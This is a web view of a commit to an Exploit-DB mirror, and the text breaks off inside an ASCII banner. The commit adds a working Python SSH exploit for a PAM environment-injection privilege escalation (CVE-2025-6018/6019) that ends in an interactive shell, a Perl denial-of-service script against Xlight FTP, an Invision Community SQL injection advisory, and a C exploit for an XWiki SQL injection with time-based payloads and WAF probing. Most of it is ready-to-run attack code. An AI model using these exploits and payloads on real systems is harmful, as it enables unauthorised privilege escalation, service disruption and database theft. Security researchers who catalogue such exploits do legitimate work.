bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Merge remote-tracking branch 'exploitdb/main'

Browse source
This commit is contained in:
Brendan McDevitt 2025-07-30 00:02:12 +00:00
commit c6207468e2
7 changed files with 1284 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

293
exploits/linux/local/52386.py Executable file
View file

@ -0,0 +1,293 @@
# Exploit Title: Linux PAM Environment - Variable Injection Local Privilege Escalation
# Exploit Author: @İbrahimsql
# Exploit Author's github: https://github.com/ibrahmsql
# Description: PAM pam_env.so module allows environment variable injection via ~/.pam_environment
# leading to privilege escalation through SystemD session manipulation
# CVE: CVE-2025-6018, CVE-2025-6019
# Vendor Homepage: https://github.com/linux-pam/linux-pam
# Software Link: https://github.com/linux-pam/linux-pam/releases
# Version: PAM 1.3.0 - 1.6.0 (vulnerable versions)
# Category: Local Privilege Escalation
# Requirements: paramiko>=2.12.0
# Usage: python3 cve_2025_6018_professional.py -i target_ip -u username -p password
# References:
# - https://access.redhat.com/security/cve/CVE-2025-6018
# - https://bugzilla.redhat.com/show_bug.cgi?id=2372693
# - https://bugzilla.suse.com/show_bug.cgi?id=1243226
import paramiko
import time
import sys
import socket
import argparse
import logging
from datetime import datetime
# Setup logging
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s [%(levelname)s] %(message)s',
datefmt='%Y-%m-%d %H:%M:%S',
handlers=[
logging.FileHandler('cve_2025_6018_exploit.log'),
logging.StreamHandler(sys.stdout)
]
)
logger = logging.getLogger(__name__)
class CVEExploit:
def __init__(self):
self.vulnerable_versions = [
"pam-1.3.0", "pam-1.3.1", "pam-1.4.0", "pam-1.5.0",
"pam-1.5.1", "pam-1.5.2", "pam-1.5.3", "pam-1.6.0"
]
def check_vulnerability(self, client):
"""Enhanced vulnerability detection"""
logger.info("Starting vulnerability assessment")
checks = {
"pam_version": "rpm -q pam || dpkg -l | grep libpam",
"pam_env": "find /etc/pam.d/ -name '*' -exec grep -l 'pam_env' {} \\; 2>/dev/null",
"pam_systemd": "find /etc/pam.d/ -name '*' -exec grep -l 'pam_systemd' {} \\; 2>/dev/null",
"systemd_version": "systemctl --version | head -1"
}
vulnerable = False
for check_name, command in checks.items():
logger.info(f"Executing check: {check_name}")
try:
stdin, stdout, stderr = client.exec_command(command, timeout=10)
output = stdout.read().decode().strip()
if check_name == "pam_version":
for vuln_ver in self.vulnerable_versions:
if vuln_ver in output:
logger.info(f"Vulnerable PAM version detected: {vuln_ver}")
vulnerable = True
break
elif check_name == "pam_env" and output:
logger.info("pam_env.so configuration found")
vulnerable = True
elif check_name == "pam_systemd" and output:
logger.info("pam_systemd.so found - escalation vector available")
if output and check_name != "pam_version":
logger.debug(f"Command output: {output[:100]}...")
except Exception as e:
logger.warning(f"Check {check_name} failed: {e}")
time.sleep(0.5)
return vulnerable
def create_malicious_environment(self, client):
"""Create enhanced .pam_environment file"""
logger.info("Creating malicious environment file")
payload = '''# CVE-2025-6018 Environment Poisoning
XDG_SEAT OVERRIDE=seat0
XDG_VTNR OVERRIDE=1
XDG_SESSION_TYPE OVERRIDE=x11
XDG_SESSION_CLASS OVERRIDE=user
XDG_RUNTIME_DIR OVERRIDE=/tmp/runtime
SYSTEMD_LOG_LEVEL OVERRIDE=debug'''
try:
logger.info("Writing .pam_environment file")
cmd = f"cat > ~/.pam_environment << 'EOF'\n{payload}\nEOF"
stdin, stdout, stderr = client.exec_command(cmd)
# Verify creation
stdin, stdout, stderr = client.exec_command("cat ~/.pam_environment")
output = stdout.read().decode()
if "OVERRIDE" in output:
logger.info("Malicious environment file created successfully")
return True
else:
logger.error("Failed to create environment file")
return False
except Exception as e:
logger.error(f"Environment poisoning failed: {e}")
return False
def test_privilege_escalation(self, client):
"""Test privilege escalation vectors"""
logger.info("Testing privilege escalation vectors")
tests = [
("SystemD Reboot", "gdbus call --system --dest org.freedesktop.login1 --object-path /org/freedesktop/login1 --method org.freedesktop.login1.Manager.CanReboot", "yes"),
("SystemD Shutdown", "gdbus call --system --dest org.freedesktop.login1 --object-path /org/freedesktop/login1 --method org.freedesktop.login1.Manager.CanPowerOff", "yes"),
("PolicyKit Check", "pkcheck --action-id org.freedesktop.policykit.exec --process $$ 2>/dev/null || echo 'denied'", "authorized")
]
escalated = False
for test_name, command, success_indicator in tests:
logger.info(f"Testing: {test_name}")
try:
stdin, stdout, stderr = client.exec_command(command, timeout=10)
output = stdout.read().decode().strip()
if success_indicator in output.lower():
logger.info(f"PRIVILEGE ESCALATION DETECTED: {test_name}")
escalated = True
else:
logger.info(f"No escalation detected: {test_name}")
except Exception as e:
logger.warning(f"Test {test_name} failed: {e}")
return escalated
def interactive_shell(self, client):
"""Professional interactive shell"""
logger.info("Starting interactive shell session")
shell = client.invoke_shell()
shell.send("export PS1='exploit$ '\n")
time.sleep(1)
# Clear buffer
while shell.recv_ready():
shell.recv(1024)
print("\n--- Interactive Shell ---")
print("Commands: 'exit' to quit, 'status' for privilege check")
while True:
try:
command = input("exploit$ ")
if command.lower() == 'exit':
break
elif command.lower() == 'status':
stdin, stdout, stderr = client.exec_command("id && groups")
print(stdout.read().decode())
continue
shell.send(command + "\n")
time.sleep(0.5)
while shell.recv_ready():
output = shell.recv(1024).decode('utf-8', errors='ignore')
print(output, end='')
except KeyboardInterrupt:
logger.warning("Use 'exit' to quit properly")
except Exception as e:
logger.error(f"Shell error: {e}")
break
def run_exploit(self, hostname, username, password=None, key_filename=None, port=22):
"""Main exploit execution"""
logger.info(f"Starting CVE-2025-6018 exploit against {hostname}:{port}")
try:
# Initial connection
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
logger.info(f"Connecting to {hostname}:{port} as {username}")
client.connect(hostname, port=port, username=username,
password=password, key_filename=key_filename, timeout=10)
logger.info("SSH connection established")
# Check vulnerability
if not self.check_vulnerability(client):
logger.error("Target does not appear vulnerable to CVE-2025-6018/6019")
return False
logger.info("Target appears vulnerable, proceeding with exploitation")
# Create malicious environment
if not self.create_malicious_environment(client):
logger.error("Failed to create malicious environment")
return False
logger.info("Reconnecting to trigger PAM environment loading")
client.close()
time.sleep(2)
# Reconnect to trigger PAM
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(hostname, port=port, username=username,
password=password, key_filename=key_filename)
logger.info("Reconnection successful")
# Test privilege escalation
if self.test_privilege_escalation(client):
logger.info("EXPLOITATION SUCCESSFUL - Privilege escalation confirmed")
self.interactive_shell(client)
else:
logger.warning("No clear privilege escalation detected")
logger.info("Manual verification may be required")
return True
except paramiko.AuthenticationException:
logger.error("Authentication failed - check credentials")
except paramiko.SSHException as e:
logger.error(f"SSH error: {e}")
except socket.error as e:
logger.error(f"Network error: {e}")
except Exception as e:
logger.error(f"Unexpected error: {e}")
finally:
try:
client.close()
except:
pass
logger.info("Connection closed")
return False
def main():
parser = argparse.ArgumentParser(
description="CVE-2025-6018/6019 PAM Environment Injection Exploit",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Examples:
python3 %(prog)s -i 192.168.1.100 -u testuser -p password123
python3 %(prog)s -i target.com -u admin -k ~/.ssh/id_rsa
"""
)
parser.add_argument("-i", "--hostname", required=True, help="Target hostname or IP")
parser.add_argument("-u", "--username", required=True, help="SSH username")
parser.add_argument("-p", "--password", help="SSH password")
parser.add_argument("-k", "--key", dest="key_filename", help="SSH private key file")
parser.add_argument("--port", type=int, default=22, help="SSH port (default: 22)")
parser.add_argument("-v", "--verbose", action="store_true", help="Enable verbose logging")
args = parser.parse_args()
if args.verbose:
logging.getLogger().setLevel(logging.DEBUG)
if not args.password and not args.key_filename:
parser.error("Provide either password (-p) or private key (-k)")
# Security warning
logger.warning("Use only with proper authorization!")
exploit = CVEExploit()
success = exploit.run_exploit(
hostname=args.hostname,
username=args.username,
password=args.password,
key_filename=args.key_filename,
port=args.port
)
sys.exit(0 if success else 1)
if __name__ == "__main__":
main()

66
exploits/multiple/dos/52382.txt Normal file
View file

@ -0,0 +1,66 @@
# Exploit Title: Xlight FTP 1.1 - Denial Of Service (DOS)
# Google Dork: N/A
# Date: 22 July 2025
# Exploit Author: Fernando Mengali
# LinkedIn: https://www.linkedin.com/in/fernando-mengali/
# Vendor Homepage: https://www.xlightftpd.com
# Software Link: N/A
# Version: 1.1
# Tested on: Windows XP
# CVE: CVE-2024-0737
$sis="$^O";
if ($sis eq "windows"){
$cmd="cls";
} else {
$cmd="clear";
}
system("$cmd");
intro();
main();
print "[+] Exploiting... \n";
my $payload = "\x41"x500;
my $ftp = Net::FTP->new($ip, Debug => 0) or die "Não foi possível se conectar ao servidor: $@";
$ftp->login($payload,"anonymous") or die "[+] Possibly exploited!";
$ftp->quit;
print "[+] Done - Exploited success!!!!!\n\n";
sub intro {
print q {
,--,
_ ___/ /\|
,;'( )__, ) ~
// // '--;
' \ | ^
^ ^
[+] LightFTP 1.1 - Denial of Service (DoS)
[*] Coded by Fernando Mengali
[@] e-mail: fernando.mengalli@gmail.com
}
}
sub main {
our ($ip, $port) = @ARGV;
unless (defined($ip) && defined($port)) {
print " \nUsage: $0 <ip> <port> \n";
exit(-1);
}
}

44
exploits/multiple/webapps/52383.txt Normal file
View file

@ -0,0 +1,44 @@
# Exploit Title: Invision Community <= 4.7.20 (calendar/view.php) - SQL Injection
# Google Dork: N/A
# Date: 23 July 2025
# Exploit Author: Egidio Romano
# LinkedIn: N/A
# Vendor Homepage: https://invisioncommunity.com
# Software Link: https://invisioncommunity.com
# Version: Certain 4.x versions before 4.7.21
# Tested on: Invision Community <= 4.7.20
# CVE: CVE-2025-48932
## Vulnerability Description
The vulnerability is located within the `/applications/calendar/modules/front/calendar/view.php` script. Specifically, in the `IPS\calendar\modules\front\calendar\view::search()` method, user input passed through the `location` request parameter is not properly sanitized before being used to construct a SQL query. This can be exploited by remote, unauthenticated attackers to, for example, read sensitive data from the database through boolean-based SQL Injection attacks. Successful exploitation of this vulnerability requires the "calendar" application to be installed and a "GeoLocation feature" (like Google Maps) to be configured.
**NOTE:** SQL Injection vulnerabilities in Invision Community 4.x might lead to admin account takeover and RCE attacks, by resetting the admin's password. However, starting from version 4.7.18, a new security encryption key has been introduced within the password reset mechanism. As such, this attack vector won't work anymore with versions >= 4.7.18.
## Proof of Concept
https://karmainsecurity.com/pocs/CVE-2025-48932.php
## Solution
Upgrade to version 4.7.21 or later.
## Disclosure Timeline
- [16/05/2025] - Vendor notified
- [27/05/2025] - Version 4.7.21 released
- [28/05/2025] - CVE identifier requested
- [28/05/2025] - CVE identifier assigned
- [23/07/2025] - Public disclosure
## CVE Reference
The Common Vulnerabilities and Exposures program (cve.org) has assigned the name CVE-2025-48932 to this vulnerability.
## Credits
Vulnerability discovered by Egidio Romano.
## Original Advisory
http://karmainsecurity.com/KIS-2025-06

674
exploits/multiple/webapps/52384.c Normal file
View file

@ -0,0 +1,674 @@
# Exploit Title: XWiki 14 - SQL Injection via getdeleteddocuments.vm
# Google Dork: N/A
# Date: 28 July 2025
# Exploit Author: Byte Reaper
# LinkedIn: N/A
# Vendor Homepage: https://www.xwiki.org
# Software Link: https://www.xwiki.org
# Version: XWiki Platform ≤ 14.x
# Tested on: XWiki Platform ≤ 14.x
# CVE: CVE-2025-32429
## Vulnerability Description
A blind SQL Injection vulnerability exists in the XWiki Platforms `getdeleteddocuments.vm` template, specifically via the `sort` parameter. The vulnerability can be exploited by sending a crafted payload to the following REST endpoint:
```
/xwiki/rest/liveData/sources/liveTable/entries?sourceParams.template=getdeleteddocuments.vm&sort=<PAYLOAD>
```
An attacker can inject arbitrary SQL statements into the underlying database query, resulting in data exfiltration, authentication bypass, or denial of service. The vulnerability was verified on XWiki Platform versions up to 14.x using a C-based curl exploit.
## Steps to Reproduce
1. Save the provided `exploit.c` file to your local environment.
2. Compile the PoC:
```
gcc -o exploit exploit.c argparse.c -lcurl
```
3. Execute against a vulnerable instance:
```
./exploit -u http://victim.example.com/xwiki
```
4. Observe response delays or injected content indicating successful SQL execution.
## Proof of Concept
- GitHub PoC: https://github.com/byteReaper77/CVE-2025-32429/blob/main/exploit.c
/*
* Author : Byte Reaper
* Telegram : @ByteReaper0
* CVE : CVE-2025-32429
* Vulnerability: SQL Injection
* Description : A vulnerability in the xwiki platform using the sort operator in the getdeletedocuments.v file, which leads to injecting malicious SQL statements into the sort= parameter.
* ------------------------------------------------------------------------------------------------------------------------------------
*/
#include <stdio.h>
#include <string.h>
#include <curl/curl.h>
#include "argparse.h"
#include <time.h>
#include <stdlib.h>
#include <unistd.h>
#define URL 2500
const char *yourUrl = NULL;
int verbose = 0;
int selecetCookie = 0;
const char *cookies = NULL;
void exitAssembly()
{
__asm__ volatile
(
"xor %%rdi, %%rdi\n\t"
"mov $231, %%rax\n\t"
"syscall\n\t"
:
:
: "rax",
"rdi"
);
}
struct Mem
{
char *buffer;
size_t len;
};
size_t write_cb(void *ptr, size_t size, size_t nmemb, void *userdata)
{
size_t total = size * nmemb;
struct Mem *m = (struct Mem *)userdata;
char *tmp = realloc(m->buffer, m->len + total + 1);
if (tmp == NULL)
{
printf("\e[1;31m[-] Failed to allocate memory!\e[0m\n");
exitAssembly();
}
m->buffer = tmp;
memcpy(&(m->buffer[m->len]), ptr, total);
m->len += total;
m->buffer[m->len] = '\0';
return total;
}
const char *payload[] =
{
"' OR '1",
" ' OR 1 -- -",
" OR "" = ",
"\" OR 1 = 1 -- -",
",(select * from (select(sleep(5)))a)",
"%2c(select%20*%20from%20(select(sleep(5)))a)",
"';WAITFOR DELAY '0:0:05'--",
"AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'='",
"AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)",
"AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)--",
"AS INJECTX WHERE 1=1 AND 1=0--",
"WHERE 1=1 AND 1=1"
};
const char *word[] =
{
"select",
"union",
"insert",
"update",
"delete",
"drop",
"create",
"alter",
"truncate",
"replace",
"or",
"and",
"not",
"1=1",
"1=0",
"--",
"#",
"/*",
"*/",
"sleep",
"benchmark",
"load_file",
"outfile",
"error",
"warning",
"mysql",
"pg_",
"exec",
"xp_",
"admin",
"root",
""
};
int numberPayload = sizeof(payload) / sizeof(payload[0]);
int numberWord = sizeof(word) / sizeof(word[0]);
char full[URL];
void injection(const char *baseUrl)
{
CURLcode res ;
CURL *curl = curl_easy_init();
struct Mem response =
{
NULL,
0
};
if (curl == NULL)
{
printf("\e[1;31m[-] Error Create Object Curl !\e[0m\n");
printf("\e[1;31m[-] Check Your Connection (Ping)...\e[0m\n");
printf("\e[1;31m[-] Command : ping google.com\n");
const char *pingCommand = "/bin/ping";
const char *argv[] = {"ping", "-c", "5", "google.com", NULL};
const char *envp[] = {NULL};
__asm__ volatile
(
"mov %[argv], %%rsi\n\t"
"mov $59, %%rax\n\t"
"mov %[envp], %%rdx\n\t"
"mov %[command], %%rdi\n\t"
"syscall\n\t"
"cmp $0, %%rax\n\t"
"jl exitSyscall\n\t"
"exitSyscall:\n\t"
"mov $0x3C, %%rax\n\t"
"xor %%rdi, %%rdi\n\t"
"syscall\n\t"
".2:\n\t"
:
: [argv] "r" (argv),
[envp] "r" (envp),
[command] "r" (pingCommand)
: "rax",
"rdi",
"rsi",
"rdx"
);
}
response.buffer = NULL;
response.len = 0;
if (verbose)
{
printf("\e[1;35m==========================================\e[0m\n");
printf("\e[1;33m[+] Cleaning Response...\e[0m\n");
printf("\e[1;33m[+] Response Buffer : %s\e[0m\n",response.buffer);
printf("\e[1;33m[+] Response Len : %d\e[0m\n",response.len);
printf("\e[1;35m==========================================\e[0m\n");
}
if (curl)
{
int n = 0;
for (int p = 0; p < numberPayload; p++)
{
char *encodePayload = curl_easy_escape(curl,
payload[p],
0);
if (!encodePayload)
{
printf("\e[1;31m[-] Error Encode Payload !\e[0m\n");
exitAssembly();
}
snprintf(full,
sizeof(full),
"%s/xwiki/rest/liveData/sources/liveTable/entries?sourceParams.template=getdeleteddocuments.vm&sort=%s",
baseUrl,
encodePayload);
printf("\e[1;34m[+] Encode Payload Successfully.\e[0m\n");
printf("\e[1;34m[+] Payload Encode : %s\e[0m\n", encodePayload);
curl_easy_setopt(curl,
CURLOPT_URL,
full);
struct timespec ts;
ts.tv_sec = 0;
ts.tv_nsec = 10000000;
printf("\e[1;34m[+] sys_nanosleep syscall (10000000)...\e[0m\n");
__asm__ volatile
(
"mov $35, %%rax\n\t"
"mov %[ts], %%rdi\n\t"
"xor %%rsi, %%rsi\n\t"
"syscall\n\t"
:
: [ts] "r" (&ts)
:"rax", "rdi", "rsi"
);
if (selecetCookie)
{
curl_easy_setopt(curl,
CURLOPT_COOKIEFILE,
cookies);
curl_easy_setopt(curl,
CURLOPT_COOKIEJAR,
cookies);
}
curl_easy_setopt(curl,
CURLOPT_FOLLOWLOCATION,
1L);
curl_easy_setopt(curl,
CURLOPT_WRITEFUNCTION,
write_cb);
if (verbose)
{
printf("\e[1;35m------------------------------------------[Verbose Curl]------------------------------------------\e[0m\n");
curl_easy_setopt(curl,
CURLOPT_VERBOSE,
1L);
}
curl_easy_setopt(curl,
CURLOPT_WRITEDATA,
&response);
curl_easy_setopt(curl,
CURLOPT_CONNECTTIMEOUT,
5L);
curl_easy_setopt(curl,
CURLOPT_TIMEOUT,
10L);
curl_easy_setopt(curl,
CURLOPT_SSL_VERIFYPEER,
0L);
curl_easy_setopt(curl,
CURLOPT_SSL_VERIFYHOST,
0L);
struct curl_slist *headers = NULL;
headers = curl_slist_append(headers,
"Accept-Language: en-US,en");
headers = curl_slist_append(headers,
"Connection: keep-alive");
headers = curl_slist_append(headers,
"Referer: http://example.com");
double delayTime;
clock_t start = clock();
res = curl_easy_perform(curl);
printf("\e[1;34m+] Payload : %s\e[0m\n", payload[p]);
printf("\e[1;34m[+] Encode Payload %s\e[0m\n", encodePayload);
printf("\e[1;32m[*] PID : %d\e[0m\n", getpid());
curl_free(encodePayload);
curl_slist_free_all(headers);
usleep(1000000);
if (res == CURLE_OK)
{
printf("-----------------------------------------------------------------\n");
long httpCode = 0;
curl_easy_getinfo(curl,
CURLINFO_RESPONSE_CODE,
&httpCode);
curl_easy_getinfo(curl,
CURLINFO_TOTAL_TIME,
&delayTime);
printf("\e[1;36m[+] Request sent successfully\e[0m\n");
printf("\e[1;34m[+] Delay Time Response : %f\e[0m\n",
delayTime);
printf("\e[1;37m[+] Input Url : %s\e[0m\n",
baseUrl);
printf("\e[1;37m[+] Full Url : %s\e[0m\n",
full);
printf("\e[1;32m[+] Http Code -> %ld\e[0m\n", httpCode);
if (httpCode >= 200 && httpCode < 300)
{
clock_t end = clock();
double timeInjection = (double) (end - start )/ CLOCKS_PER_SEC;
printf("\e[1;36m[+] Positive Http Code (200 < 300) : %ld\n",httpCode);
for (int w = 0; w < numberWord; w++)
{
if (strstr(response.buffer, word[w]) != NULL)
{
printf("\e[1;34m[+] A suspicious word was found in the server's response !!\e[0m\n");
printf("\e[1;34m[+] Word Found : %s\e[0m\n", word[w]);
printf("[+] The vulnerability CVE-2025-32429 exists on the server\e[0m\n");
printf("\e[1;37m\n======================================== [Response Server] ========================================\e[0m\n");
printf("%s\n", response.buffer);
printf("\e[1;32m[Len] : %d\e[0m\n", response.len);
printf("\e[1;37m\n==================================================================================================\e[0m\n");
printf("[+] Check Timeout Response...\e[0m\n");
if (timeInjection >= 7.5)
{
printf("\e[1;34m[+] Possible SQL Executed (Delay Detected)\e[0m\n");
printf("\e[1;34m[+] The server is experiencing a vulnerability (CVE-2025-32429)\e[0m\n");
}
else
{
printf("\e[1;31m[-] No response delay detected !\e[0m\n");
}
}
else
{
printf("\e[1;31m[-] No suspicious words were found in the server response !\e[0m\n");
}
}
}
else
{
printf("\e[1;31m[-] HTTP Code Not Range Positive (200 < 300) : %ld\e[0m\n", httpCode);
printf("\e[1;34m[+] Try Next Payload : %s\e[0m\n", payload[p]);
}
}
else
{
printf("\e[1;31m[-] Error Send Request\e[0m\n");
printf("\e[1;31m[-] Error : %s\e[0m\n", curl_easy_strerror(res));
printf("\e[1;31m[-] Please Check Your Connection !\e[0m\n");
exitAssembly();
}
}
}
if (response.buffer)
{
free(response.buffer);
response.buffer = NULL;
response.len = 0;
}
curl_easy_cleanup(curl);
}
void checkWaf(const char *base)
{
printf("[+] Check Waf ============================================================\e[0m\n");
struct Mem response = {NULL, 0};
response.buffer = NULL;
response.len = 0;
int step1 = 0;
int step2= 0;
int step3 = 0;
int step4 = 0;
int step5 = 0;
if (verbose)
{
printf("\e[1;33m[+] Response Buffer Cleaning Successfully \e[0m\n");
printf("\e[1;33m[+] Response Buffer : %s\e[0m\n", response.buffer);
printf("\e[1;33m[+] Response Len : %zu\e[0m\n", response.len);
}
const char *keyWaf[] =
{
"Access Denied",
"Request blocked",
"Security violation",
"Your request looks suspicious"
};
int numberWaf = sizeof(keyWaf) / sizeof(keyWaf[0]);
printf("\e[1;34m[+] Base URL : %s\e[0m\n", base);
CURLcode res;
char fullWaf[URL];
snprintf(fullWaf, sizeof(fullWaf),
"%s/xwiki/rest/liveData/sources/liveTable/entries?sourceParams.template=getdeleteddocuments.vm&sort=''",
base);
printf("\e[1;34m[+] Full Url : %s\e[0m\n",fullWaf);
CURL *curl = curl_easy_init();
if (curl == NULL)
{
printf("\e[1;31m[-] Error: Could not initialize CURL.\e[0m\n");
exitAssembly();
}
curl_easy_setopt(curl,
CURLOPT_URL, fullWaf);
curl_easy_setopt(curl,
CURLOPT_FOLLOWLOCATION,
1L);
struct curl_slist *headers = NULL;
headers = curl_slist_append(headers,
"User-Agent: sqlmap");
curl_easy_setopt(curl,
CURLOPT_HTTPHEADER,
headers);
curl_easy_setopt(curl,
CURLOPT_WRITEDATA,
&response);
curl_easy_setopt(curl,
CURLOPT_WRITEFUNCTION,
write_cb);
res = curl_easy_perform(curl);
double timeD = 0;
long code = 0;
long redirects = 0;
if (res == CURLE_OK)
{
curl_easy_getinfo(curl,
CURLINFO_REDIRECT_COUNT,
&redirects);
curl_easy_getinfo(curl,
CURLINFO_TOTAL_TIME,
&timeD);
curl_easy_getinfo(curl,
CURLINFO_RESPONSE_CODE,
&code);
printf("\e[1;36m[+] Step 1: Check Number redirects\e[0m\n");
if (redirects > 1)
{
printf("\e[1;35m============= [ WAF DETECTED ] =============\e[0m\n");
printf("\e[1;34m[+] Suspicious number of redirects: %ld\e[0m\n", redirects);
printf("\e[1;35m============================================\e[0m\n");
step1 = 1;
}
else
{
printf("[-] Waf not detected (Number redirects)\e[0m\n");
}
printf("\e[1;34m[+] Request sent with simple payload ('')\e[0m\n");
printf("\e[1;35m[+] Step 2: Check HTTP Code\e[0m\n");
printf("\e[1;32m[+] HTTP Code: %ld\e[0m\n", code);
if (code == 403 ||
code == 404 ||
code == 503)
{
printf("\e[1;35m============= [ WAF DETECTED ] =============\e[0m\n");
printf("\e[1;34m[+] Blocking response code: %ld\e[0m\n", code);
printf("\e[1;34m[+] Page is likely filtered by WAF.\e[0m\n");
printf("\e[1;35m============================================\e[0m\n");
step2 = 1;
}
else
{
printf("\e[1;31m[-] No blocking HTTP code.\e[0m\n");
printf("\e[1;31m[-] WAF not detected based on HTTP code.\e[0m\n");
}
printf("[+] Step 3: Check Response Time\e[0m\n");
if (timeD >= 3.0)
{
printf("\e[1;35m============= [ WAF DETECTED ] =============\e[0m\n");
printf("\e[1;34m[+] Suspicious delay in response: %.2f sec\e[0m\n", timeD);
printf("\e[1;35m============================================\e[0m\n");
step3 = 1;
}
else
{
printf("\e[1;31m[-] Normal response time: %.2f sec\e[0m\n", timeD);
printf("\e[1;31m[-] WAF not detected based on delay.\e[0m\n");
}
printf("[+] Step 4: Check Response Content\e[0m\n");
for (int l = 0; l < numberWaf; l++)
{
if (response.buffer)
{
if (strstr(response.buffer, keyWaf[l]))
{
printf("\e[1;35m============= [ WAF DETECTED ] =============\e[0m\n");
printf("\e[1;34m[+] Word Found : %s\e[0m\n",keyWaf[l]);
printf("\e[1;34m[+] Waf Detected (Word Found In Response)\e[0m\n");
printf("\e[1;35m============================================\e[0m\n");
step4 = 1;
}
else
{
printf("\e[1;31m[-] Word Not Found : %s\e[0m\n", keyWaf[l]);
printf("\e[1;31m[-] WAF not detected (Not Found Word in response)\e[0m\n");
}
}
else
{
printf("\e[1;31m[-] Response Buffer is NULL !\n");
printf("\e[1;35m[+] Step 5 : Check Response Server (NULL + Http Code 200)\e[0m\n");
if (code == 200)
{
printf("\e[1;35m============= [ WAF DETECTED ] =============\e[0m\n");
printf("\e[1;32m[+] Http Code : %ld\n", code);
printf("\e[1;34m[+] Waf Detected (Response NULL And http Code 200)\e[0m\n");
if (verbose && response.buffer)
{
printf("\e[1;35m[+] Response Server : ==========================================\e[0m\n");
printf("%s\e[0m\n", response.buffer);
}
printf("\e[1;35m============================================\e[0m\n");
step5 = 1;
}
else
{
printf("\e[1;31m[-] Waf Not Detected (Http Code not 200 And buffer NULL)!\e[0m\n");
}
}
}
}
else
{
printf("[!] curl_easy_perform() failed: %s\e[0m\n", curl_easy_strerror(res));
}
printf("\e[1;35m[+] Step 6: Check Connection Reset\e[0m\n");
if (res == CURLE_RECV_ERROR)
{
printf("\e[1;35m============= [ WAF DETECTED ] =============\e[0m\n");
printf("\e[1;34m[+] Connection reset detected (CURLE_RECV_ERROR)\e[0m\n");
printf("\e[1;35m============================================\e[0m\n");
}
else
{
printf("\e[1;31m[-] No connection reset error.\e[0m\n");
}
curl_slist_free_all(headers);
curl_easy_cleanup(curl);
printf("\e[1;35m\n[+] Result Status Waf : \e[0m\n");
if (step1 || step2 || step3 || step4 || step5)
{
printf("\e[1;36m[=] Final Verdict: WAF Detected \e[0m\n");
}
else
{
printf("\e[1;31m[=] Final Verdict: No WAF Detected !\e[0m\n");
}
}
int main(int argc,
const char **argv)
{
printf
(
"⣦⠃⣿⣶⣶⣶⣶⣾⠀⠀⠀⠀⠀⠀⢀⡴⣲⠋⢁⡴⠋⠁⠀⣠⠶⠋⠁⠀⣠⢴⠆⠀⢠⠆⠀⢀⣠⢞⡓⠒⠀⠀⠉⠓⠲⢤⣀⠀⠀⠀⠀⠉⢧⡀⠀⠀⠀⠀⠀\n"
" ⠀⣿⣿⣿⣿⣿⠇⠀⠀⠀⣀⡤⠚⠁⡼⣣⡴⠋⠀⠀⢀⡞⠁⠀⠀⢀⣠⣿⡋⠀⣠⣿⠴⠚⣉⣉⠉⠉⠉⠛⠭⣟⠒⢤⣀⠈⠙⠦⢄⣀⠀⠈⢣⠀⠀⠀⠀⠀⠀⠀⠀⠀\n"
"⠀⣸⣿⣿⣿⣿⡟⠀⣴⠚⠉⠁⠀⢀⡾⠟⠉⠀⠀⣀⣴⡟⠀⠀⣠⣖⣋⢹⣿⢁⣾⣏⠠⢤⣀⡀⠉⠙⠆⠀⠀⠀⠈⠳⢤⡈⠳⣄⠀⠀⠉⠙⠶⣌⣳⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n"
"⠀⣿⣿⣿⣿⡿⠀⠀⠈⠛⣒⣒⡾⠋⠀⠀⢀⣤⣾⢫⠟⠀⠀⣸⠧⣄⠘⠳⢯⡉⠈⠉⠓⣄⠀⠉⠻⣍⠛⠲⣄⠀⠀⠀⠀⠙⢦⡈⠓⢄⠀⠀⠀⠀⠙⢷⡀⠀⠀⠀⠀⠀⠀⠀⠀\n"
"⡸⣿⣿⡹⢿⣃⣀⠴⠊⠉⣠⠎⠀⠀⢀⣶⣿⠾⡵⠋⠀⠀⡼⣡⠴⣦⣀⣀⠀⠉⠲⣄⠀⠈⢳⡀⠀⠀⠱⣄⠀⠙⢆⠀⠀⠀⠀⠙⢦⡀⠱⣄⠀⠀⠀⠀⠹⣌⣓⣶⢶⡦⠀⠀⠀\n"
"⢳⣿⣿⣿⣟⠟⠃⠀⣠⠞⠁⠀⠀⣤⠛⠛⢒⣾⢁⣴⣤⠞⢰⡇⢸⠋⢻⠈⣝⢦⡀⠈⠓⢄⠀⠱⡀⠀⠀⠈⠳⡀⠀⠳⣄⠀⠀⠀⠀⠙⢦⠈⠳⡀⠀⠲⣄⠈⢿⡄⠀⠀⠀⠀⠀\n"
"⣼⣿⣿⢟⣡⡴⣹⠟⢁⠀⢀⣠⠞⠉⣽⠯⠉⢉⣽⢿⣶⣤⢸⢁⠿⡀⢸⡇⢘⢦⢻⡳⣄⠀⠀⠀⠙⣆⠀⠀⠀⠙⢆⠀⠘⢦⡀⠀⠀⠀⠀⠁⠀⠀⠀⠀⠨⠵⣶⡄⠀⠀⠀⠀⠀\n"
"⣿⡿⣵⣿⠋⠺⢥⣴⣯⠞⡋⢀⣤⠞⣱⢯⣴⠏⢡⡏⠀⢿⠸⢸⡀⡇⠈⣧⠈⢾⢏⢧⡈⠓⢦⡀⠀⠙⢧⣀⠀⠀⠈⠳⣄⠀⢳⡀⠀⠀⠀⠀⠀⠀⠀⠀⠐⢺⣯⣽⣦⠀⠀⠀⠀\n"
"⣿⣾⣿⡅⠀⠀⠀⠸⠯⠯⡖⠋⣰⣣⢣⣿⠃⢀⠏⢠⠀⣾⠀⡞⣧⡇⠀⢸⡄⠘⣞⢇⣌⢆⠀⢻⡳⣄⡀⠈⠓⠤⣄⠀⠈⢣⣀⠻⡀⢦⡀⠀⠀⠀⠀⢀⣀⣰⣆⠉⡝⣧⠀⠀⠀\n"
